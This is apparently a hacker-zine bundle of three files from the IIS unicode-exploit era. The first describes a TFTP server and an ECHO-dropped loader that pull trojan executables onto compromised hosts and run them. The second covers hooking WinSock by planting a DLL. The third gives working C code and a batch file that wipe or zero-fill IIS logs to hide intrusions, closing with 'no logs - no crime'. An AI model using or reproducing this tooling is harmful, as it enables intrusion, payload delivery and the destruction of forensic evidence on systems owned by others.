ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FILEXFER.TXT]ÄÄÄ xpl0itati0n-0riented f1le Xfer ------------------------------ additional stuff: TFTPSERV\*.* and ZFTP\*.* Some time ago IIS unicode bug was very popular, and many good people were playing with it. All the methods of exploiting IIS using this vulnerability were based on the following: since it is possible to execute shell commands on the vulnerable machine, it is possible to upload some executable file there and execute it. And there were some common methods of uploading executable files: 1. Using TFTP.EXE - run TFTP server, which will serve some trojan executable - by means of TFTP.EXE, download executable from TFTP server - execute downloaded file 2. using ECHO command - by means of ECHO command, create some text file - execute created file More info about details of this stupid useless things you can read out of here, for sure. Main problem of all these methods were file uploading. All win32 TFTP servers were working in GUI-mode, which is sucks, same as uploading different .ASPs, scripts and other shit -- because this all is not automation-oriented stuff. There were also sources of unix TFTP server, which makes win32 programmer crying when looking into. So, here will be presented the following things: 1. Sources of console multithreaded win32 TFTP server, which allows only GET method, tested with win2k::TFTP.EXE NOTE: TFTP.EXE, when GET'ting, opens for w+ temporary file, such as TFTP-nnnnnnn., which then marked as read-only. Name of this temporary file is choosen depending not on seconds, but on some other time structure fields, so, when TFTP.EXE is remotely executed several times with small time interval, it results in error 'can't write to local file 'xxx'' -- because stupid TFTP.EXE can not reopen for w+ own temporary readonly file. 2. ZFTP Client and Server: BASE64-alike encoded .COM file (0..9,A..Z,a..z,-,_), to be dropped by means of ECHO command, which then downloads and runs main executable. It is also useful when TFTP.EXE is deleted by some unknown motherfucker. ZFTP CLIENT/SERVER for win32 ---------------------------- machine_A(hax0r): 1. run ZFTP SERVER (listen for connections) 2. by means of ECHO command, drop .COM file (ZFTP CLIENT) 2. remotely run ZFTP CLIENT on machine_B, specifying server's ip/port in cmdline machine_B(target): 1. ZFTP CLIENT: contact ZFTP SERVER on machine_A 2. download some file from server 3. run downloaded file CLIENT's commandline specifies server port & ip, to connect to. C:\>CLIENT.COM ____30397F000001 ____ -->signature 3039 -->htons(server_port), here 12345 7F000001 -->server ip, address of machine_A, to download file from, here ZFTP protocol is simple TCP file xfer, initiated by client. Transferred file is padded by AA,55,AA,55 bytes. After file is sent, TCP session is closed by server, and then client checks this 4-byte signature to decide if file is transferred ok. Notes ----- Both servers are multithreaded, and oriented to long independend serving. For each server's address there created independed server thread, which listens for incoming connections on corresponding IP. This means that you can use any IP if server is running on machine with multiple addresses. When client is connecting, there also created client's thread, in which file is passed to client. There are also created special monitoring thread, which check client/server threads and kills/restarts them if they're halted. While this process all handles/sockets are correctly closed, so there will be no memory leak. Also both servers allows adding SEH (try/except), to make'em more reliable. To make server working right, remove debug logging (log.cpp), then change -lap to -laa (cui-->gui) in the make.bat file, and recompile. * * * ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FILEXFER.TXT]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WINSOCK.TXT]ÄÄÄ WinSock Logger -------------- additional stuff: WSOCKLOG\*.* This stuff will show you how to re-write standard system DLL's, making them working same as original ones. Also, it describes my own WinSock Logger, which i wrote when was learning WinSock API. This logger is based on the following idea: when PE EXE program is executed, DLL files are searched at first in the current directory, and only after that in the system ones. So, we can put our own WSOCK32.DLL to the same directory with EXE file, and in this way hook and process all the WinSock API calls. The main trick is to write own WSOCK32.DLL having exactly the same exported functions as original one has; and all these functions must have the same ordinal values within PE Export Table structure. The same exported functions problem can be solved by writing all own functions which will call original ones, as shown below: u_long WSAAPI old_ntohl (IN u_long netlong); u_long WSAAPI new_ntohl (IN u_long netlong) { return old_ntohl(netlong); } // original send(), will be imported from WSOCKXX.DLL(old WSOCK32.DLL) int WSAAPI old_send ( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags); // new send(), will be exported from WSOCK32.DLL int WSAAPI new_send ( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags) { // options --> process send ? if ((x_options[ID_SEND]&1)==0) return old_send(s, buf, len, flags); // log call log("* send(socket=%08X, len=%08X, flags=%s)", (DWORD)s, len, flagstr(flags)); // options --> log send() data ? if (x_options[ID_SEND]==3) dump_buf((char*)buf,len); // call original send() int res = old_send(s, buf, len, flags); // log result log(" returns %08X, error=%s", res, wsaerrmsg());; // return return res; } // new_send() The problem with ordinals is a bit more hard, because ordinals, written in .DEF file, are incorrectly processed by TLINK32.EXE. So, special program called 'ordinal' was written, which re-sorts ordinals within PE files corresponding to given .DEF file. Well, after you understood how this all was done, take a look into ws32_??.cpp: it has not only documented winsock api function prototypes, but also all other function prototypes i've found within WSOCK32.DLL, on both 98 and 2k systems. Also note, that 98 and 2k systems has different undocumented functions within WSOCK32.DLL, and different ordinal values. Now, about how this all worx. Just put WSOCK32.DLL and WSOCKXX.DLL from W2K or W98 directory into directory with program you're interested in; then run (or re-run) this program and enjoy. Also, both DLLs can be put into %SystemDirectory%, and as such you will be able to log everything. CONFIG is simple logger configuration editor, it just edits logger settings which are all stored in registry. Note, that modified settings are applied when DLL is loaded into memory: no difference, by loader or by LoadLibrary, so, when changing configuration, dont forget to restart debugging application. * * * ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WINSOCK.TXT]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[IISLOG.TXT]ÄÄÄ IIS Log Cleaning in Run-Time ---------------------------- additional stuff: IISLOG\*.* Some people, who played with IIS servers enough, know, that by default there are log files, located in %SystemDirectory%\LogFiles\W3SVC1\yymmdd.log These files contains all http requests sent to IIS server, including source IP addresses. While IIS is running, current log file is opened, and can not be deleted. So, some good people does this: by means of ECHO, create and execute .BAT file, containing the following: iisreset /stop del %systemdir%\LogFiles\W3SVC1\*.log iisreset /start It will stop IIS service, delete log files and start IIS again. This method has the following problems: 1. In some cases service will not stop. 2. In other cases it will not start. ;-) 3. Log files may be configured to be located in another place. 4. Such log deletion can not be checked, because each http request results in correspoding log record, _after_ the request is processed - so, even if you will delete log file with some request, right after that new log file will be created with new 1st record containing your IP. There is another method, which based on the following fact: log file is opened in compatible mode, allowing it to be opened in read-write by other processes. And all we need to do is to open log file for rw using FILE_SHARE_READ | FILE_SHARE_WRITE flags. So, the right way is not to delete log files, and not to hide within tons of IP addresses of other stupid haxor, but to fuck machine completely: by uploading there executable program which will clear log files with high reliability. And here is log-cleaning part of such program: #define C_IIS_KEYPATH "SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters" #define C_IIS_LOGSUBKEY "LogFileDirectory" #define IISLOG_BLOCK_SIZE 65536 void cleaniislogfile(char* filename) // clean single .log file { // open LOG file in compatible mode HANDLE h = CreateFile(filename, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); // return if not opened if (h == INVALID_HANDLE_VALUE) return; // allocate some temporary buffer DWORD buflen; char* buf = (char*)malloc( IISLOG_BLOCK_SIZE+1 ); if (buf != NULL) { // if allocated, zerofill memset(buf, 0x00, IISLOG_BLOCK_SIZE); // get file size DWORD len = GetFileSize(h, NULL); // zerofill file while(len) { DWORD buflen = MIN( len, IISLOG_BLOCK_SIZE ); WriteFile(h, buf, buflen, &buflen, NULL); len -= buflen; } // free allocated memory free(buf); } // close file CloseHandle(h); } // cleaniislogfile() void cleaniislogrecursive(char* path, int reclevel) // search for .log files { // copy path to search in char* buf = (char*)malloc(strlen(path)+MAXPATH+2); if (buf==NULL) return; strcpy(buf, path); // add \ if needed if (strrchr(buf,'\\')+1!=strchr(buf,0)) strcat(buf, "\\"); char* bufend = strchr(buf, 0); // add *.* strcat(buf, "*.*"); // start search WIN32_FIND_DATA ff; HANDLE h = FindFirstFile(buf, &ff); if (h != INVALID_HANDLE_VALUE) { for(;;) // for each file found { // form full path and file name strcpy(bufend, ff.cFileName); // if directory if (ff.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { if (strcmp(ff.cFileName, "." )!=0) if (strcmp(ff.cFileName, "..")!=0) if (reclevel == 0) // logs are contained in LogFiles\W3SVC\ directory by default if (strncmpi(ff.cFileName, "W3SVC", 5)==0) cleaniislogrecursive(buf, reclevel+1); } else { char* t = strrchr(ff.cFileName,'.'); if (t && (stricmp(t,".log")==0)) cleaniislogfile(buf); // zerofill found file } // find next file, exit if no more files if (FindNextFile(h, &ff) == 0) break; } // stop search FindClose(h); } // free allocated memory free(buf); } // cleaniislogrec() // clear everything. call it from your src. // be sure that current http request processing by iis has been finished. void CleanIISLogs() { // 1. \WINNT\SYSTEM32\LogFiles cleaniislogrecursive("\\WINNT\\SYSTEM32\\LogFiles\\",0); // 2. C:\WINNT\SYSTEM32\LogFiles cleaniislogrecursive("C:\\WINNT\\SYSTEM32\\LogFiles\\",0); // 3. %SystemDirectory%\LogFiles char temp[MAXPATH]; GetSystemDirectory(temp,MAXPATH); strcat(temp, "\\LogFiles\\"); cleaniislogrecursive(temp,0); // 4. %SYSTEM\CurrentControlSet\Services\W3SVC\Parameters.LogFileDirectory% // open key HKEY hKey; if ( RegOpenKeyEx(HKEY_LOCAL_MACHINE, C_IIS_KEYPATH, 0, KEY_QUERY_VALUE, &hKey) != ERROR_SUCCESS ) return; // get key value (log files directory) char buf[1024]; DWORD buflen = sizeof(buf); if ( RegQueryValueEx(hKey, C_IIS_LOGSUBKEY, 0, NULL, buf, &buflen) == ERROR_SUCCESS ) { // can contain %SystemDirectory% - alike environment strings, so expand char expbuf[1024]; ExpandEnvironmentStrings(buf, expbuf, sizeof(expbuf)); // find & clean logs cleaniislogrecursive(expbuf, 0); } RegCloseKey(hKey); } // CleanIISLogs() Well, thats all. And remember: no logs - no crime. * * * ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[IISLOG.TXT]ÄÄÄ